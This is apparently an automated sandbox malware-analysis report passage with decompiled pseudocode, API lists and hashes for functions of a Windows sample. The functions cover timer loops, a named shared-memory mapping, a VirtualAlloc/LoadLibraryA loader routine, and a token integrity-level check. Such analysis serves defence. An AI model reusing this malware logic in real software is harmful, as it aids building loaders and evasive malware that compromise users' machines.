            • Associated: 00000000.00000002.509790314.00000000007EA000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.509803700.00000000007EC000.00000002.10000000.00040000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7e0000_server.jbxd
            Similarity
            • API ID: ExceptionRaise$ErrorLastLibraryLoad
            • String ID: $
            • API String ID: 948315288-3993045852
            • Opcode ID: 10481ad35296d4ec2f4003b0c44eaee7ae66dfbc354e79cc74b2db86d5bb1da3
            • Instruction ID: a7877ce0f48c53fe65454dda851c188099f9fee604ecdb233020e04f7047476d
            • Opcode Fuzzy Hash: 10481ad35296d4ec2f4003b0c44eaee7ae66dfbc354e79cc74b2db86d5bb1da3
            • Instruction Fuzzy Hash: F6813E71A02649AFDB50CF99D880B9EB7F5FB4C310F14802DE909DB250EB78E905CB55
            Uniqueness

            Uniqueness Score: -1.00%

            Function 007E6815 Relevance: 16.7, APIs: 11, Instructions: 151timememoryCOMMON
            Download Yara Rule

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 183 7e6815-7e6847 memset CreateWaitableTimerA 184 7e684d-7e68a6 _allmul SetWaitableTimer WaitForMultipleObjects 183->184 185 7e69c8-7e69ce GetLastError 183->185 187 7e68ac-7e68af 184->187 188 7e6930-7e6936 184->188 186 7e69d2-7e69dc 185->186 189 7e68ba 187->189 190 7e68b1 call 7e5251 187->190 191 7e6937-7e693b 188->191 195 7e68c4 189->195 196 7e68b6-7e68b8 190->196 193 7e693d-7e6945 HeapFree 191->193 194 7e694b-7e694f 191->194 193->194 194->191 197 7e6951-7e695b CloseHandle 194->197 198 7e68c8-7e68cd 195->198 196->189 196->195 197->186 199 7e68cf-7e68d6 198->199 200 7e68e0-7e690d call 7e35d2 198->200 199->200 201 7e68d8 199->201 204 7e690f-7e691a 200->204 205 7e695d-7e6962 200->205 201->200 204->198 206 7e691c-7e692c call 7e69e6 204->206 207 7e6964-7e696a 205->207 208 7e6981-7e6989 205->208 206->188 207->188 211 7e696c-7e697f call 7e63f6 207->211 209 7e698f-7e69bd _allmul SetWaitableTimer WaitForMultipleObjects 208->209 209->198 212 7e69c3 209->212 211->209 212->188
            C-Code - Quality: 83%
            			E007E6815(void* __edx, intOrPtr _a4, intOrPtr _a8) {
				void _v48;
				long _v52;
				struct %anon52 _v60;
				char _v72;
				long _v76;
				void* _v80;
				union _LARGE_INTEGER _v84;
				struct %anon52 _v92;
				void* _v96;
				void* _v100;
				union _LARGE_INTEGER _v104;
				long _v108;
				struct %anon52 _v124;
				long _v128;
				struct %anon52 _t46;
				void* _t51;
				long _t53;
				void* _t54;
				struct %anon52 _t61;
				long _t65;
				struct %anon52 _t66;
				void* _t69;
				void* _t73;
				signed int _t74;
				void* _t76;
				void* _t78;
				void** _t82;
				signed int _t86;
				void* _t89;

				_t76 = __edx;
				_v52 = 0;
				memset( &_v48, 0, 0x2c);
				_t89 = (_t86 & 0xfffffff8) - 0x54 + 0xc;
				_t46 = CreateWaitableTimerA(0, 1, 0);
				_v60 = _t46;
				if(_t46 == 0) {
					_v92.HighPart = GetLastError();
				} else {
					_push(0xffffffff);
					_push(0xff676980);
					_push(0);
					_push( *0x7ea2e0);
					_v76 = 0;
					_v80 = 0;
					L007E82DA();
					_v84.LowPart = _t46;
					_v80 = _t76;
					SetWaitableTimer(_v76,  &_v84, 0, 0, 0, 0);
					_t51 =  *0x7ea30c; // 0x248
					_v76 = _t51;
					_t53 = WaitForMultipleObjects(2,  &_v80, 0, 0xffffffff);
					_v108 = _t53;
					if(_t53 == 0) {
						if(_a8 != 0) {
							L4:
							 *0x7ea2ec = 5;
						} else {
							_t69 = E007E5251(_t76); // executed
							if(_t69 != 0) {
								goto L4;
							}
						}
						_v104.LowPart = 0;
						L6:
						L6:
						if(_v104.LowPart == 1 && ( *0x7ea300 & 0x00000001) == 0) {
							_v104.LowPart = 2;
						}
						_t74 = _v104.LowPart;
						_t58 = _t74 << 4;
						_t78 = _t89 + (_t74 << 4) + 0x38;
						_t75 = _t74 + 1;
						_v92.LowPart = _t74 + 1;
						_t61 = E007E35D2( &_v96, _t75, _t89 + _t58 + 0x38, _t78,  &_v100); // executed
						_v124 = _t61;
						if(_t61 != 0) {
							goto L17;
						}
						_t66 = _v92;
						_v104.LowPart = _t66;
						if(_t66 != 3) {
							goto L6;
						} else {
							_v124.HighPart = E007E69E6(_t75,  &_v72, _a4, _a8);
						}
						goto L12;
						L17:
						__eflags = _t61 - 0x10d2;
						if(_t61 != 0x10d2) {
							_push(0xffffffff);
							_push(0xff676980);
							_push(0);
							_push( *0x7ea2e4);
							goto L21;
						} else {
							__eflags =  *0x7ea2e8; // 0x0
							if(__eflags == 0) {
								goto L12;
							} else {
								_t61 = E007E63F6();
								_push(0xffffffff);
								_push(0xdc3cba00);
								_push(0);
								_push( *0x7ea2e8);
								L21:
								L007E82DA();
								_v104.LowPart = _t61;
								_v100 = _t78;
								SetWaitableTimer(_v96,  &_v104, 0, 0, 0, 0); // executed
								_t65 = WaitForMultipleObjects(2,  &_v100, 0, 0xffffffff);
								_v128 = _t65;
								__eflags = _t65;
								if(_t65 == 0) {
									goto L6;
								} else {
									goto L12;
								}
							}
						}
						L25:
					}
					L12:
					_t82 =  &_v72;
					_t73 = 3;
					do {
						_t54 =  *_t82;
						if(_t54 != 0) {
							HeapFree( *0x7ea2d8, 0, _t54);
						}
						_t82 =  &(_t82[4]);
						_t73 = _t73 - 1;
					} while (_t73 != 0);
					CloseHandle(_v80);
				}
				return _v92.HighPart;
				goto L25;
			}
































            0x007e6815
            0x007e682b
            0x007e682f
            0x007e6834
            0x007e683b
            0x007e6841
            0x007e6847
            0x007e69ce
            0x007e684d
            0x007e684d
            0x007e684f
            0x007e6854
            0x007e6855
            0x007e685b
            0x007e685f
            0x007e6863
            0x007e6871
            0x007e687f
            0x007e6883
            0x007e6885
            0x007e6892
            0x007e689e
            0x007e68a0
            0x007e68a6
            0x007e68af
            0x007e68ba
            0x007e68ba
            0x007e68b1
            0x007e68b1
            0x007e68b8
            0x00000000
            0x00000000
            0x007e68b8
            0x007e68c4
            0x00000000
            0x007e68c8
            0x007e68cd
            0x007e68d8
            0x007e68d8
            0x007e68e0
            0x007e68e6
            0x007e68ee
            0x007e68f7
            0x007e68fe
            0x007e6902
            0x007e6907
            0x007e690d
            0x00000000
            0x00000000
            0x007e690f
            0x007e6913
            0x007e691a
            0x00000000
            0x007e691c
            0x007e692c
            0x007e692c
            0x00000000
            0x007e695d
            0x007e695d
            0x007e6962
            0x007e6981
            0x007e6983
            0x007e6988
            0x007e6989
            0x00000000
            0x007e6964
            0x007e6964
            0x007e696a
            0x00000000
            0x007e696c
            0x007e696c
            0x007e6971
            0x007e6973
            0x007e6978
            0x007e6979
            0x007e698f
            0x007e698f
            0x007e6997
            0x007e69a5
            0x007e69a9
            0x007e69b5
            0x007e69b7
            0x007e69bb
            0x007e69bd
            0x00000000
            0x007e69c3
            0x00000000
            0x007e69c3
            0x007e69bd
            0x007e696a
            0x00000000
            0x007e6962
            0x007e6930
            0x007e6932
            0x007e6936
            0x007e6937
            0x007e6937
            0x007e693b
            0x007e6945
            0x007e6945
            0x007e694b
            0x007e694e
            0x007e694e
            0x007e6955
            0x007e6955
            0x007e69dc
            0x00000000

            APIs
            • memset.NTDLL ref: 007E682F
            • CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 007E683B
            • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 007E6863
            • SetWaitableTimer.KERNELBASE(?,?,00000000,00000000,00000000,00000000), ref: 007E6883
            • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,?,?,?,?,?,?,?,?,?,007E26E9,?), ref: 007E689E
            • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,007E26E9,?,00000000), ref: 007E6945
            • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,007E26E9,?,00000000,?,?), ref: 007E6955
            • _allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 007E698F
            • SetWaitableTimer.KERNELBASE(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF,00000002,?,?,?), ref: 007E69A9
            • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 007E69B5
              • Part of subcall function 007E5251: StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,02F19218,00000000,?,74D0F710,00000000,74D0F730), ref: 007E52A0
              • Part of subcall function 007E5251: HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,02F19160,?,00000000,30314549,00000014,004F0053,02F19270), ref: 007E533D
              • Part of subcall function 007E5251: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,007E68B6), ref: 007E534F
            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,007E26E9,?,00000000,?,?), ref: 007E69C8
            Memory Dump Source
            • Source File: 00000000.00000002.509771149.00000000007E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 007E0000, based on PE: true
            • Associated: 00000000.00000002.509763566.00000000007E0000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.509782183.00000000007E9000.00000002.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.509790314.00000000007EA000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.509803700.00000000007EC000.00000002.10000000.00040000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7e0000_server.jbxd
            Similarity
            • API ID: FreeHeapTimerWaitable$MultipleObjectsWait_allmul$CloseCreateErrorHandleLastmemset
            • String ID:
            • API String ID: 3521023985-0
            • Opcode ID: 16c010d60060a6c97d4cf7a2254a4e57d2b6afc1a6e634aed3bfea77f3d8f384
            • Instruction ID: 02fd5f235c673c167452211d1d47ca9bcf30492f19082b7e2c0582086e21caef
            • Opcode Fuzzy Hash: 16c010d60060a6c97d4cf7a2254a4e57d2b6afc1a6e634aed3bfea77f3d8f384
            • Instruction Fuzzy Hash: E3517D7140A390BFC7119F128C8499BBBECFB9C360F508A1EF5A5D61A1D7389544CF96
            Uniqueness

            Uniqueness Score: -1.00%

            Function 007E415A Relevance: 13.6, APIs: 9, Instructions: 72filetimeCOMMON
            Download Yara Rule

            Control-flow Graph

            C-Code - Quality: 74%
            			E007E415A(intOrPtr __edx, void** _a4, void** _a8) {
				intOrPtr _v8;
				struct _FILETIME* _v12;
				short _v56;
				struct _FILETIME* _t12;
				intOrPtr _t13;
				void* _t17;
				void* _t21;
				intOrPtr _t27;
				long _t28;
				void* _t30;

				_t27 = __edx;
				_t12 =  &_v12;
				GetSystemTimeAsFileTime(_t12);
				_push(0x192);
				_push(0x54d38000);
				_push(_v8);
				_push(_v12);
				L007E82D4();
				_push(_t12);
				_v12 = _t12;
				_t13 =  *0x7ea348; // 0x272d5a8
				_t5 = _t13 + 0x7eb7b4; // 0x2f18d5c
				_t6 = _t13 + 0x7eb644; // 0x530025
				_push(0x16);
				_push( &_v56);
				_v8 = _t27;
				L007E7F3A();
				_t17 = CreateFileMappingW(0xffffffff, 0x7ea34c, 4, 0, 0x1000,  &_v56); // executed
				_t30 = _t17;
				if(_t30 == 0) {
					_t28 = GetLastError();
				} else {
					if(GetLastError() == 0xb7) {
						_t21 = MapViewOfFile(_t30, 6, 0, 0, 0); // executed
						if(_t21 == 0) {
							_t28 = GetLastError();
							if(_t28 != 0) {
								goto L6;
							}
						} else {
							 *_a4 = _t30;
							 *_a8 = _t21;
							_t28 = 0;
						}
					} else {
						_t28 = 2;
						L6:
						CloseHandle(_t30);
					}
				}
				return _t28;
			}













            0x007e415a
            0x007e4162
            0x007e4166
            0x007e416c
            0x007e4171
            0x007e4176
            0x007e4179
            0x007e417c
            0x007e4181
            0x007e4182
            0x007e4185
            0x007e418a
            0x007e4191
            0x007e419b
            0x007e419d
            0x007e419e
            0x007e41a1
            0x007e41bd
            0x007e41c3
            0x007e41c7
            0x007e4215
            0x007e41c9
            0x007e41d6
            0x007e41e6
            0x007e41ee
            0x007e4200
            0x007e4204
            0x00000000
            0x00000000
            0x007e41f0
            0x007e41f3
            0x007e41f8
            0x007e41fa
            0x007e41fa
            0x007e41d8
            0x007e41da
            0x007e4206
            0x007e4207
            0x007e4207
            0x007e41d6
            0x007e421c

            APIs
            • GetSystemTimeAsFileTime.KERNEL32(?,?,00000000,?,?,?,?,?,?,007E25B1,?,?,4D283A53,?,?), ref: 007E4166
            • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 007E417C
            • _snwprintf.NTDLL ref: 007E41A1
            • CreateFileMappingW.KERNELBASE(000000FF,007EA34C,00000004,00000000,00001000,?,?,?,?,?,00000000), ref: 007E41BD
            • GetLastError.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,007E25B1,?,?,4D283A53,?), ref: 007E41CF
            • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000,?,?,?,?,00000000), ref: 007E41E6
            • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,?,?,?,?,?,007E25B1,?,?,4D283A53), ref: 007E4207
            • GetLastError.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,007E25B1,?,?,4D283A53,?), ref: 007E420F
            Memory Dump Source
            • Source File: 00000000.00000002.509771149.00000000007E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 007E0000, based on PE: true
            • Associated: 00000000.00000002.509763566.00000000007E0000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.509782183.00000000007E9000.00000002.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.509790314.00000000007EA000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.509803700.00000000007EC000.00000002.10000000.00040000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7e0000_server.jbxd
            Similarity
            • API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
            • String ID:
            • API String ID: 1814172918-0
            • Opcode ID: ec42225e66449355faeccb8fdd9df1ee8bdab1e60a406d4a781e6e062db29d05
            • Instruction ID: 794caa95d6d2ec42a60d06ce9d3fc556581f30fc7e5dc5aec1299d698b5f129c
            • Opcode Fuzzy Hash: ec42225e66449355faeccb8fdd9df1ee8bdab1e60a406d4a781e6e062db29d05
            • Instruction Fuzzy Hash: FE21A572642284BBCB21DB69CC45F9E37B9BB8C750F214121F705EB2D0D7789905CB55
            Uniqueness

            Uniqueness Score: -1.00%

            Function 007E4BE7 Relevance: 12.1, APIs: 8, Instructions: 75networkCOMMON
            Download Yara Rule

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 246 7e4be7-7e4bf2 247 7e4bfe-7e4c11 246->247 248 7e4bf4-7e4bf9 call 7e16b2 246->248 250 7e4c1c-7e4c21 247->250 251 7e4c13-7e4c1a InternetSetStatusCallback InternetCloseHandle 247->251 248->247 252 7e4c2c-7e4c31 250->252 253 7e4c23-7e4c2a InternetSetStatusCallback InternetCloseHandle 250->253 251->250 254 7e4c3c-7e4c47 252->254 255 7e4c33-7e4c3a InternetSetStatusCallback InternetCloseHandle 252->255 253->252 256 7e4c4c-7e4c51 254->256 257 7e4c49-7e4c4a CloseHandle 254->257 255->254 258 7e4c56-7e4c5d 256->258 259 7e4c53-7e4c54 CloseHandle 256->259 257->256 260 7e4c5f-7e4c68 call 7e61da 258->260 261 7e4c6b-7e4c70 258->261 259->258 260->261 263 7e4c78-7e4c7c 261->263 264 7e4c72-7e4c73 call 7e61da 261->264 267 7e4c7e-7e4c7f call 7e61da 263->267 268 7e4c84-7e4c89 263->268 264->263 267->268 270 7e4c8b-7e4c8c call 7e61da 268->270 271 7e4c91-7e4c93 268->271 270->271
            C-Code - Quality: 93%
            			E007E4BE7(intOrPtr* __eax, void* __ebx, void* __ecx, void* __edi) {
				void* _t17;
				void* _t18;
				void* _t19;
				void* _t20;
				void* _t21;
				intOrPtr _t24;
				void* _t37;
				void* _t41;
				intOrPtr* _t45;

				_t41 = __edi;
				_t37 = __ebx;
				_t45 = __eax;
				_t16 =  *((intOrPtr*)(__eax + 0x20));
				if( *((intOrPtr*)(__eax + 0x20)) != 0) {
					E007E16B2(_t16, __ecx, 0xea60);
				}
				_t17 =  *(_t45 + 0x18);
				_push(_t37);
				_push(_t41);
				if(_t17 != 0) {
					InternetSetStatusCallback(_t17, 0);
					InternetCloseHandle( *(_t45 + 0x18)); // executed
				}
				_t18 =  *(_t45 + 0x14);
				if(_t18 != 0) {
					InternetSetStatusCallback(_t18, 0);
					InternetCloseHandle( *(_t45 + 0x14));
				}
				_t19 =  *(_t45 + 0x10);
				if(_t19 != 0) {
					InternetSetStatusCallback(_t19, 0);
					InternetCloseHandle( *(_t45 + 0x10));
				}
				_t20 =  *(_t45 + 0x1c);
				if(_t20 != 0) {
					CloseHandle(_t20);
				}
				_t21 =  *(_t45 + 0x20);
				if(_t21 != 0) {
					CloseHandle(_t21);
				}
				_t22 =  *((intOrPtr*)(_t45 + 8));
				if( *((intOrPtr*)(_t45 + 8)) != 0) {
					E007E61DA(_t22);
					 *((intOrPtr*)(_t45 + 8)) = 0;
					 *((intOrPtr*)(_t45 + 0x30)) = 0;
				}
				_t23 =  *((intOrPtr*)(_t45 + 0xc));
				if( *((intOrPtr*)(_t45 + 0xc)) != 0) {
					E007E61DA(_t23);
				}
				_t24 =  *_t45;
				if(_t24 != 0) {
					_t24 = E007E61DA(_t24);
				}
				_t46 =  *((intOrPtr*)(_t45 + 4));
				if( *((intOrPtr*)(_t45 + 4)) != 0) {
					return E007E61DA(_t46);
				}
				return _t24;
			}












            0x007e4be7
            0x007e4be7
            0x007e4be9
            0x007e4beb
            0x007e4bf2
            0x007e4bf9
            0x007e4bf9
            0x007e4bfe
            0x007e4c01
            0x007e4c08
            0x007e4c11
            0x007e4c15
            0x007e4c1a
            0x007e4c1a
            0x007e4c1c
            0x007e4c21
            0x007e4c25
            0x007e4c2a
            0x007e4c2a
            0x007e4c2c
            0x007e4c31
            0x007e4c35
            0x007e4c3a
            0x007e4c3a
            0x007e4c3c
            0x007e4c47
            0x007e4c4a
            0x007e4c4a
            0x007e4c4c
            0x007e4c51
            0x007e4c54
            0x007e4c54
            0x007e4c56
            0x007e4c5d
            0x007e4c60
            0x007e4c65
            0x007e4c68
            0x007e4c68
            0x007e4c6b
            0x007e4c70
            0x007e4c73
            0x007e4c73
            0x007e4c78
            0x007e4c7c
            0x007e4c7f
            0x007e4c7f
            0x007e4c84
            0x007e4c89
            0x00000000
            0x007e4c8c
            0x007e4c93

            APIs
            • InternetSetStatusCallback.WININET(?,00000000), ref: 007E4C15
            • InternetCloseHandle.WININET(?), ref: 007E4C1A
            • InternetSetStatusCallback.WININET(?,00000000), ref: 007E4C25
            • InternetCloseHandle.WININET(?), ref: 007E4C2A
            • InternetSetStatusCallback.WININET(?,00000000), ref: 007E4C35
            • InternetCloseHandle.WININET(?), ref: 007E4C3A
            • CloseHandle.KERNEL32(?,00000000,00000102,?,?,007E2248,?,?,74CF81D0,00000000,00000000), ref: 007E4C4A
            • CloseHandle.KERNEL32(?,00000000,00000102,?,?,007E2248,?,?,74CF81D0,00000000,00000000), ref: 007E4C54
              • Part of subcall function 007E16B2: WaitForMultipleObjects.KERNEL32(00000002,007E7C47,00000000,007E7C47,?,?,?,007E7C47,0000EA60), ref: 007E16CD
            Memory Dump Source
            • Source File: 00000000.00000002.509771149.00000000007E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 007E0000, based on PE: true
            • Associated: 00000000.00000002.509763566.00000000007E0000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.509782183.00000000007E9000.00000002.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.509790314.00000000007EA000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.509803700.00000000007EC000.00000002.10000000.00040000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7e0000_server.jbxd
            Similarity
            • API ID: Internet$CloseHandle$CallbackStatus$MultipleObjectsWait
            • String ID:
            • API String ID: 2824497044-0
            • Opcode ID: eda3c4ce25e52cc7ffd0f84068576b62fc134a156dce673ca342f96d0e31231d
            • Instruction ID: d079176e3fb1fc406f9c5fdcbbbe2d2bb2a1734f255a620b6eb517fbd10829c6
            • Opcode Fuzzy Hash: eda3c4ce25e52cc7ffd0f84068576b62fc134a156dce673ca342f96d0e31231d
            • Instruction Fuzzy Hash: 1F113D7660269CABC530AFABDD84C1BB7FDAB4C3013654D18F185D3521C738FC458A64
            Uniqueness

            Uniqueness Score: -1.00%

            Function 0078003C Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 515memoryCOMMON
            Download Yara Rule

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 273 78003c-780047 274 780049 273->274 275 78004c-780263 call 780a3f call 780e0f call 780d90 VirtualAlloc 273->275 274->275 291 78028b-780292 275->291 292 780265-780289 call 780a69 275->292 294 7802a1-7802b0 291->294 296 7802ce-7803c2 VirtualProtect call 780cce call 780ce7 292->296 294->296 297 7802b2-7802cc 294->297 303 7803d1-7803e0 296->303 297->294 304 780439-7804b8 VirtualFree 303->304 305 7803e2-780437 call 780ce7 303->305 307 7804be-7804cd 304->307 308 7805f4-7805fe 304->308 305->303 310 7804d3-7804dd 307->310 311 78077f-780789 308->311 312 780604-78060d 308->312 310->308 314 7804e3-780505 310->314 315 78078b-7807a3 311->315 316 7807a6-7807b0 311->316 312->311 317 780613-780637 312->317 325 780517-780520 314->325 326 780507-780515 314->326 315->316 318 78086e-7808be LoadLibraryA 316->318 319 7807b6-7807cb 316->319 320 78063e-780648 317->320 324 7808c7-7808f9 318->324 322 7807d2-7807d5 319->322 320->311 323 78064e-78065a 320->323 327 780824-780833 322->327 328 7807d7-7807e0 322->328 323->311 329 780660-78066a 323->329 330 7808fb-780901 324->330 331 780902-78091d 324->331 332 780526-780547 325->332 326->332 336 780839-78083c 327->336 333 7807e2 328->333 334 7807e4-780822 328->334 335 78067a-780689 329->335 330->331 340 78054d-780550 332->340 333->327 334->322 337 78068f-7806b2 335->337 338 780750-78077a 335->338 336->318 339 78083e-780847 336->339 341 7806ef-7806fc 337->341 342 7806b4-7806ed 337->342 338->320 343 780849 339->343 344 78084b-78086c 339->344 346 7805e0-7805ef 340->346 347 780556-78056b 340->347 348 78074b 341->348 349 7806fe-780748 341->349 342->341 343->318 344->336 346->310 350 78056d 347->350 351 78056f-78057a 347->351 348->335 349->348 350->346 352 78059b-7805bb 351->352 353 78057c-780599 351->353 358 7805bd-7805db 352->358 353->358 358->340
            APIs
            • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0078024D
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.509728577.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_780000_server.jbxd
            Yara matches
            Similarity
            • API ID: AllocVirtual
            • String ID: cess$kernel32.dll
            • API String ID: 4275171209-1230238691
            • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
            • Instruction ID: 11e41495bae7d7e4d724454cbfe7a509fbcdab37b2827ee2bc84ff87f4a961b5
            • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
            • Instruction Fuzzy Hash: 19527974A01229DFDBA4CF58C984BA8BBB1BF09304F1480D9E50DAB351DB34AE99DF54
            Uniqueness

            Uniqueness Score: -1.00%

            Function 007E5E40 Relevance: 10.6, APIs: 7, Instructions: 75COMMON
            Download Yara Rule

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 385 7e5e40-7e5e5b 386 7e5efa-7e5f06 385->386 387 7e5e61-7e5e7a OpenProcessToken 385->387 388 7e5e7c-7e5ea7 GetTokenInformation * 2 387->388 389 7e5ef9 387->389 390 7e5eef-7e5ef8 CloseHandle 388->390 391 7e5ea9-7e5eb6 call 7e33dc 388->391 389->386 390->389 394 7e5eee 391->394 395 7e5eb8-7e5ec9 GetTokenInformation 391->395 394->390 396 7e5ecb-7e5ee5 GetSidSubAuthorityCount GetSidSubAuthority 395->396 397 7e5ee8-7e5ee9 call 7e61da 395->397 396->397 397->394
            C-Code - Quality: 100%
            			E007E5E40(long* _a4) {
				long _v8;
				void* _v12;
				void _v16;
				long _v20;
				int _t33;
				void* _t46;

				_v16 = 1;
				_v20 = 0x2000;
				if( *0x7ea2fc > 5) {
					_v16 = 0;
					if(OpenProcessToken(0xffffffff, 0x20008,  &_v12) != 0) {
						GetTokenInformation(_v12, 0x14,  &_v16, 4,  &_v8); // executed
						_v8 = 0;
						GetTokenInformation(_v12, 0x19, 0, 0,  &_v8); // executed
						if(_v8 != 0) {
							_t46 = E007E33DC(_v8);
							if(_t46 != 0) {
								_t33 = GetTokenInformation(_v12, 0x19, _t46, _v8,  &_v8); // executed
								if(_t33 != 0) {
									_v20 =  *(GetSidSubAuthority( *_t46,  *(GetSidSubAuthorityCount( *_t46)) - 0x00000001 & 0x000000ff));
								}
								E007E61DA(_t46);
							}
						}
						CloseHandle(_v12);
					}
				}
				 *_a4 = _v20;
				return _v16;
			}









            0x007e5e4d
            0x007e5e54
            0x007e5e5b
            0x007e5e6f
            0x007e5e7a
            0x007e5e92
            0x007e5e9f
            0x007e5ea2
            0x007e5ea7
            0x007e5eb2
            0x007e5eb6
            0x007e5ec5
            0x007e5ec9
            0x007e5ee5
            0x007e5ee5
            0x007e5ee9
            0x007e5ee9
            0x007e5eee
            0x007e5ef2
            0x007e5ef8
            0x007e5ef9
            0x007e5f00
            0x007e5f06

            APIs
            • OpenProcessToken.ADVAPI32(000000FF,00020008,00000000,00000000), ref: 007E5E72
            • GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),00000001,00000004,?,00000000), ref: 007E5E92
            • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 007E5EA2
            • CloseHandle.KERNEL32(00000000), ref: 007E5EF2
              • Part of subcall function 007E33DC: RtlAllocateHeap.NTDLL(00000000,00000000,007E62F6), ref: 007E33E8
            • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,?,?,?,?), ref: 007E5EC5
            • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 007E5ECD
            • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 007E5EDD
            Memory Dump Source
            • Source File: 00000000.00000002.509771149.00000000007E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 007E0000, based on PE: true
            • Associated: 00000000.00000002.509763566.00000000007E0000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.509782183.00000000007E9000.00000002.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.509790314.00000000007EA000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.509803700.00000000007EC000.00000002.10000000.00040000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7e0000_server.jbxd
            Similarity
            • API ID: Token$Information$Authority$AllocateCloseCountHandleHeapOpenProcess
            • String ID:
            • API String ID: 1295030180-0
            • Opcode ID: ee5987b68d3d04720cd5dab269e65ba6a6e49e0776d092e398c6c68c3a75049d
            • Instruction ID: 4f9b90d996f55b102b142aa8ee5b37d399393a232da2e5c307143115469d5ff9
            • Opcode Fuzzy Hash: ee5987b68d3d04720cd5dab269e65ba6a6e49e0776d092e398c6c68c3a75049d
            • Instruction Fuzzy Hash: 0721597590128DFFEB00DF91CC84EEEBBB9EB48304F0040A5EA10AA161DB799B54DB60
            Uniqueness

            Uniqueness Score: -1.00%

            Function 007E6675 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68stringCOMMON
            Download Yara Rule

            Control-flow Graph

            C-Code - Quality: 64%
            			E007E6675(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _t9;
				intOrPtr _t13;
				char* _t19;
				char* _t28;
				void* _t33;
				void* _t34;
				char* _t36;
				void* _t38;
				intOrPtr* _t39;
				char* _t40;
				char* _t42;
				char* _t43;

				_t34 = __edx;
				_push(__ecx);
				_t9 =  *0x7ea348; // 0x272d5a8
				_t1 = _t9 + 0x7eb516; // 0x253d7325
				_t36 = 0;
				_t28 = E007E5815(__ecx, _t1);
				if(_t28 != 0) {
					_t39 = __imp__;
					_t13 =  *_t39(_t28, _t38);
					_v8 = _t13;
					_t6 =  *_t39(_a4) + 1; // 0x2f19601
					_t40 = E007E33DC(_v8 + _t6);
					if(_t40 != 0) {
						strcpy(_t40, _t28);
						_pop(_t33);
						__imp__(_t40, _a4);
						_t19 = E007E5063(_t33, _t34, _t40, _a8); // executed
						_t36 = _t19;
						E007E61DA(_t40);
						_t42 = E007E4AC7(StrTrimA(_t36, "="), _t36);
						if(_t42 != 0) {
							E007E61DA(_t36);
							_t36 = _t42;
						}
						_t43 = E007E2708(_t36, _t33);
						if(_t43 != 0) {
							E007E61DA(_t36);
							_t36 = _t43;
						}
					}
					E007E61DA(_t28);
				}
				return _t36;
			}
















            0x007e6675
            0x007e6678
            0x007e6679
            0x007e6680
            0x007e6687
            0x007e668e
            0x007e6692
            0x007e6699
            0x007e66a0
            0x007e66a5
            0x007e66ad
            0x007e66b7
            0x007e66bb
            0x007e66bf
            0x007e66c5
